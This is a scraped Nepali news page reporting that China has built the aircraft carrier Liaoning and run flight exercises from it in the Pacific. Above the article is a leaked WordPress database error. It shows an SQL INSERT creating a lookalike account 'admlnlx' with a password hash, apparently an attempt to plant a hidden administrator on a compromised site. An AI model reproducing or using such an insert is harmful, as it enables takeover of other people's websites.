WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgPhq8JC09lruKx38FEkCHK5chcyFz/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:22:52', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस १० –
चीनले पहिलोपल्ट पानीजहाजमै विमान अवतरण गर्न मिल्ने एयरक्राफ्ट क्यारियर बनाएको छ ।आइतवार उक्त पानीजहाज सामुद्रिक अभ्यासका लागि प्रशान्त महासागरको पश्चिमी भागतर्फ लगिएको चिनियाँ रक्षा मन्त्रालयले जनायो ।

उक्त पानीजहाजलाई लियाओनिङ नाम दिइएको छ । सन् २०१२ मा चिनियाँ जलसेनाले उक्त जहाज बनाउन लगाएको थियो ।

पानीजहाजमा फाइटर जेट र हेलिकप्टरहरू एकपछि अर्को गर्दै उडान र अवतरण गरेका थिए । उनीहरूले आकाशमै लडाईं गर्ने र इन्धन भर्ने अभ्यास पनि गरेका थिए ।
एजेन्सी